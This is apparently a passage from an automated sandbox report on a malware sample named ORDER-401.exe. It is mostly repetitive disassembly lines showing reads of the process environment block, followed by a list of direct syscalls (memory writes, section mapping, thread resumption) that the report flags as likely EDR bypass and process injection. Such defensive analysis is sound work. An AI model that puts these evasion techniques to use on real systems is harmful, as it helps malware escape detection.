                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0158096E mov eax, dword ptr fs:[00000030h]4_2_0158096E
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0158096E mov edx, dword ptr fs:[00000030h]4_2_0158096E
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0158096E mov eax, dword ptr fs:[00000030h]4_2_0158096E
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01538918 mov eax, dword ptr fs:[00000030h]4_2_01538918
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01538918 mov eax, dword ptr fs:[00000030h]4_2_01538918
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015CC912 mov eax, dword ptr fs:[00000030h]4_2_015CC912
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015BE908 mov eax, dword ptr fs:[00000030h]4_2_015BE908
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015BE908 mov eax, dword ptr fs:[00000030h]4_2_015BE908
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C892A mov eax, dword ptr fs:[00000030h]4_2_015C892A
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015D892B mov eax, dword ptr fs:[00000030h]4_2_015D892B
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0154A9D0 mov eax, dword ptr fs:[00000030h]4_2_0154A9D0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0154A9D0 mov eax, dword ptr fs:[00000030h]4_2_0154A9D0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0154A9D0 mov eax, dword ptr fs:[00000030h]4_2_0154A9D0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0154A9D0 mov eax, dword ptr fs:[00000030h]4_2_0154A9D0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0154A9D0 mov eax, dword ptr fs:[00000030h]4_2_0154A9D0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0154A9D0 mov eax, dword ptr fs:[00000030h]4_2_0154A9D0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015749D0 mov eax, dword ptr fs:[00000030h]4_2_015749D0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015D69C0 mov eax, dword ptr fs:[00000030h]4_2_015D69C0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015729F9 mov eax, dword ptr fs:[00000030h]4_2_015729F9
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015729F9 mov eax, dword ptr fs:[00000030h]4_2_015729F9
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0160A9D3 mov eax, dword ptr fs:[00000030h]4_2_0160A9D3
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015CE9E0 mov eax, dword ptr fs:[00000030h]4_2_015CE9E0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C89B3 mov esi, dword ptr fs:[00000030h]4_2_015C89B3
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C89B3 mov eax, dword ptr fs:[00000030h]4_2_015C89B3
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C89B3 mov eax, dword ptr fs:[00000030h]4_2_015C89B3
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015529A0 mov eax, dword ptr fs:[00000030h]4_2_015529A0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015529A0 mov eax, dword ptr fs:[00000030h]4_2_015529A0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015529A0 mov eax, dword ptr fs:[00000030h]4_2_015529A0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015529A0 mov eax, dword ptr fs:[00000030h]4_2_015529A0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015529A0 mov eax, dword ptr fs:[00000030h]4_2_015529A0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015529A0 mov eax, dword ptr fs:[00000030h]4_2_015529A0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015529A0 mov eax, dword ptr fs:[00000030h]4_2_015529A0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015529A0 mov eax, dword ptr fs:[00000030h]4_2_015529A0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015529A0 mov eax, dword ptr fs:[00000030h]4_2_015529A0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015529A0 mov eax, dword ptr fs:[00000030h]4_2_015529A0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015529A0 mov eax, dword ptr fs:[00000030h]4_2_015529A0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015529A0 mov eax, dword ptr fs:[00000030h]4_2_015529A0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015529A0 mov eax, dword ptr fs:[00000030h]4_2_015529A0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015409AD mov eax, dword ptr fs:[00000030h]4_2_015409AD
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015409AD mov eax, dword ptr fs:[00000030h]4_2_015409AD
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01570854 mov eax, dword ptr fs:[00000030h]4_2_01570854
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01544859 mov eax, dword ptr fs:[00000030h]4_2_01544859
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01544859 mov eax, dword ptr fs:[00000030h]4_2_01544859
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01552840 mov ecx, dword ptr fs:[00000030h]4_2_01552840
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015D6870 mov eax, dword ptr fs:[00000030h]4_2_015D6870
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015D6870 mov eax, dword ptr fs:[00000030h]4_2_015D6870
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015CE872 mov eax, dword ptr fs:[00000030h]4_2_015CE872
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015CE872 mov eax, dword ptr fs:[00000030h]4_2_015CE872
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015CC810 mov eax, dword ptr fs:[00000030h]4_2_015CC810
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01562835 mov eax, dword ptr fs:[00000030h]4_2_01562835
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01562835 mov eax, dword ptr fs:[00000030h]4_2_01562835
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01562835 mov eax, dword ptr fs:[00000030h]4_2_01562835
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01562835 mov ecx, dword ptr fs:[00000030h]4_2_01562835
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01562835 mov eax, dword ptr fs:[00000030h]4_2_01562835
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01562835 mov eax, dword ptr fs:[00000030h]4_2_01562835
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015E483A mov eax, dword ptr fs:[00000030h]4_2_015E483A
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015E483A mov eax, dword ptr fs:[00000030h]4_2_015E483A
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157A830 mov eax, dword ptr fs:[00000030h]4_2_0157A830
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0160A8E4 mov eax, dword ptr fs:[00000030h]4_2_0160A8E4
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0156E8C0 mov eax, dword ptr fs:[00000030h]4_2_0156E8C0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157C8F9 mov eax, dword ptr fs:[00000030h]4_2_0157C8F9
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157C8F9 mov eax, dword ptr fs:[00000030h]4_2_0157C8F9
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015CC89D mov eax, dword ptr fs:[00000030h]4_2_015CC89D
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01540887 mov eax, dword ptr fs:[00000030h]4_2_01540887
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015EEB50 mov eax, dword ptr fs:[00000030h]4_2_015EEB50
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015E8B42 mov eax, dword ptr fs:[00000030h]4_2_015E8B42
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015D6B40 mov eax, dword ptr fs:[00000030h]4_2_015D6B40
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015D6B40 mov eax, dword ptr fs:[00000030h]4_2_015D6B40
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0160AB40 mov eax, dword ptr fs:[00000030h]4_2_0160AB40
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0153CB7E mov eax, dword ptr fs:[00000030h]4_2_0153CB7E
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015BEB1D mov eax, dword ptr fs:[00000030h]4_2_015BEB1D
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015BEB1D mov eax, dword ptr fs:[00000030h]4_2_015BEB1D
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015BEB1D mov eax, dword ptr fs:[00000030h]4_2_015BEB1D
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015BEB1D mov eax, dword ptr fs:[00000030h]4_2_015BEB1D
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015BEB1D mov eax, dword ptr fs:[00000030h]4_2_015BEB1D
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015BEB1D mov eax, dword ptr fs:[00000030h]4_2_015BEB1D
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015BEB1D mov eax, dword ptr fs:[00000030h]4_2_015BEB1D
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015BEB1D mov eax, dword ptr fs:[00000030h]4_2_015BEB1D
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015BEB1D mov eax, dword ptr fs:[00000030h]4_2_015BEB1D
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01608B28 mov eax, dword ptr fs:[00000030h]4_2_01608B28
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01608B28 mov eax, dword ptr fs:[00000030h]4_2_01608B28
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0156EB20 mov eax, dword ptr fs:[00000030h]4_2_0156EB20
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0156EB20 mov eax, dword ptr fs:[00000030h]4_2_0156EB20
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015EEBD0 mov eax, dword ptr fs:[00000030h]4_2_015EEBD0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01540BCD mov eax, dword ptr fs:[00000030h]4_2_01540BCD
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01540BCD mov eax, dword ptr fs:[00000030h]4_2_01540BCD
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01540BCD mov eax, dword ptr fs:[00000030h]4_2_01540BCD
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01560BCB mov eax, dword ptr fs:[00000030h]4_2_01560BCB
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01560BCB mov eax, dword ptr fs:[00000030h]4_2_01560BCB
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01560BCB mov eax, dword ptr fs:[00000030h]4_2_01560BCB
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01548BF0 mov eax, dword ptr fs:[00000030h]4_2_01548BF0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01548BF0 mov eax, dword ptr fs:[00000030h]4_2_01548BF0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01548BF0 mov eax, dword ptr fs:[00000030h]4_2_01548BF0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0156EBFC mov eax, dword ptr fs:[00000030h]4_2_0156EBFC
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015CCBF0 mov eax, dword ptr fs:[00000030h]4_2_015CCBF0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01550BBE mov eax, dword ptr fs:[00000030h]4_2_01550BBE
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01550BBE mov eax, dword ptr fs:[00000030h]4_2_01550BBE
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01546A50 mov eax, dword ptr fs:[00000030h]4_2_01546A50
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01546A50 mov eax, dword ptr fs:[00000030h]4_2_01546A50
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01546A50 mov eax, dword ptr fs:[00000030h]4_2_01546A50
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01546A50 mov eax, dword ptr fs:[00000030h]4_2_01546A50
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01546A50 mov eax, dword ptr fs:[00000030h]4_2_01546A50
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01546A50 mov eax, dword ptr fs:[00000030h]4_2_01546A50
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01546A50 mov eax, dword ptr fs:[00000030h]4_2_01546A50
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01550A5B mov eax, dword ptr fs:[00000030h]4_2_01550A5B
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01550A5B mov eax, dword ptr fs:[00000030h]4_2_01550A5B
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015BCA72 mov eax, dword ptr fs:[00000030h]4_2_015BCA72
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015BCA72 mov eax, dword ptr fs:[00000030h]4_2_015BCA72
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157CA6F mov eax, dword ptr fs:[00000030h]4_2_0157CA6F
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157CA6F mov eax, dword ptr fs:[00000030h]4_2_0157CA6F
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157CA6F mov eax, dword ptr fs:[00000030h]4_2_0157CA6F
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015EEA60 mov eax, dword ptr fs:[00000030h]4_2_015EEA60
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015CCA11 mov eax, dword ptr fs:[00000030h]4_2_015CCA11
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01564A35 mov eax, dword ptr fs:[00000030h]4_2_01564A35
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01564A35 mov eax, dword ptr fs:[00000030h]4_2_01564A35
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157CA38 mov eax, dword ptr fs:[00000030h]4_2_0157CA38
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157CA24 mov eax, dword ptr fs:[00000030h]4_2_0157CA24
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0156EA2E mov eax, dword ptr fs:[00000030h]4_2_0156EA2E
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01540AD0 mov eax, dword ptr fs:[00000030h]4_2_01540AD0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01574AD0 mov eax, dword ptr fs:[00000030h]4_2_01574AD0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01574AD0 mov eax, dword ptr fs:[00000030h]4_2_01574AD0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01596ACC mov eax, dword ptr fs:[00000030h]4_2_01596ACC
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01596ACC mov eax, dword ptr fs:[00000030h]4_2_01596ACC
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01596ACC mov eax, dword ptr fs:[00000030h]4_2_01596ACC
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157AAEE mov eax, dword ptr fs:[00000030h]4_2_0157AAEE
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157AAEE mov eax, dword ptr fs:[00000030h]4_2_0157AAEE
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01578A90 mov edx, dword ptr fs:[00000030h]4_2_01578A90
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0154EA80 mov eax, dword ptr fs:[00000030h]4_2_0154EA80
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0154EA80 mov eax, dword ptr fs:[00000030h]4_2_0154EA80
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0154EA80 mov eax, dword ptr fs:[00000030h]4_2_0154EA80
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0154EA80 mov eax, dword ptr fs:[00000030h]4_2_0154EA80
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0154EA80 mov eax, dword ptr fs:[00000030h]4_2_0154EA80
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0154EA80 mov eax, dword ptr fs:[00000030h]4_2_0154EA80
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0154EA80 mov eax, dword ptr fs:[00000030h]4_2_0154EA80
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0154EA80 mov eax, dword ptr fs:[00000030h]4_2_0154EA80
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0154EA80 mov eax, dword ptr fs:[00000030h]4_2_0154EA80
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01614A80 mov eax, dword ptr fs:[00000030h]4_2_01614A80
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01548AA0 mov eax, dword ptr fs:[00000030h]4_2_01548AA0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01548AA0 mov eax, dword ptr fs:[00000030h]4_2_01548AA0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01596AA4 mov eax, dword ptr fs:[00000030h]4_2_01596AA4
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01540D59 mov eax, dword ptr fs:[00000030h]4_2_01540D59
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01540D59 mov eax, dword ptr fs:[00000030h]4_2_01540D59
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01540D59 mov eax, dword ptr fs:[00000030h]4_2_01540D59
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01548D59 mov eax, dword ptr fs:[00000030h]4_2_01548D59
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01548D59 mov eax, dword ptr fs:[00000030h]4_2_01548D59
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01548D59 mov eax, dword ptr fs:[00000030h]4_2_01548D59
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01548D59 mov eax, dword ptr fs:[00000030h]4_2_01548D59
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01548D59 mov eax, dword ptr fs:[00000030h]4_2_01548D59
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015D8D6B mov eax, dword ptr fs:[00000030h]4_2_015D8D6B
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01536D10 mov eax, dword ptr fs:[00000030h]4_2_01536D10
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01536D10 mov eax, dword ptr fs:[00000030h]4_2_01536D10
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01536D10 mov eax, dword ptr fs:[00000030h]4_2_01536D10
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01574D1D mov eax, dword ptr fs:[00000030h]4_2_01574D1D
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015F8D10 mov eax, dword ptr fs:[00000030h]4_2_015F8D10
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015F8D10 mov eax, dword ptr fs:[00000030h]4_2_015F8D10
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0155AD00 mov eax, dword ptr fs:[00000030h]4_2_0155AD00
                Source: C:\Users\user\Desktop\ORDER-401.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeNtCreateMutant: Direct from: 0x774635CCJump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeNtWriteVirtualMemory: Direct from: 0x77462E3CJump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeNtMapViewOfSection: Direct from: 0x77462D1CJump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeNtResumeThread: Direct from: 0x774636ACJump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeNtProtectVirtualMemory: Direct from: 0x77462F9CJump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeNtSetInformationProcess: Direct from: 0x77462C5CJump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeNtSetInformationThread: Direct from: 0x774563F9Jump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeNtNotifyChangeKey: Direct from: 0x77463C2CJump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeNtProtectVirtualMemory: Direct from: 0x77457B2EJump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeNtAllocateVirtualMemory: Direct from: 0x77462BFCJump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeNtQueryInformationProcess: Direct from: 0x77462C26Jump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeNtResumeThread: Direct from: 0x77462FBCJump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeNtReadFile: Direct from: 0x77462ADCJump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeNtQuerySystemInformation: Direct from: 0x77462DFCJump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeNtDelayExecution: Direct from: 0x77462DDCJump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeNtAllocateVirtualMemory: Direct from: 0x77463C9CJump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeNtClose: Direct from: 0x77462B6C
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeNtCreateUserProcess: Direct from: 0x7746371CJump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeNtWriteVirtualMemory: Direct from: 0x7746490CJump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeNtAllocateVirtualMemory: Direct from: 0x774648ECJump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeNtQuerySystemInformation: Direct from: 0x774648CCJump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeNtQueryVolumeInformationFile: Direct from: 0x77462F2CJump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeNtReadVirtualMemory: Direct from: 0x77462E8CJump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeNtCreateKey: Direct from: 0x77462C6CJump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeNtSetInformationThread: Direct from: 0x77462B4CJump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeNtQueryAttributesFile: Direct from: 0x77462E6CJump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeNtDeviceIoControlFile: Direct from: 0x77462AECJump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeNtOpenSection: Direct from: 0x77462E0CJump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeNtCreateFile: Direct from: 0x77462FECJump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeNtOpenFile: Direct from: 0x77462DCCJump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeNtQueryInformationToken: Direct from: 0x77462CACJump to behavior
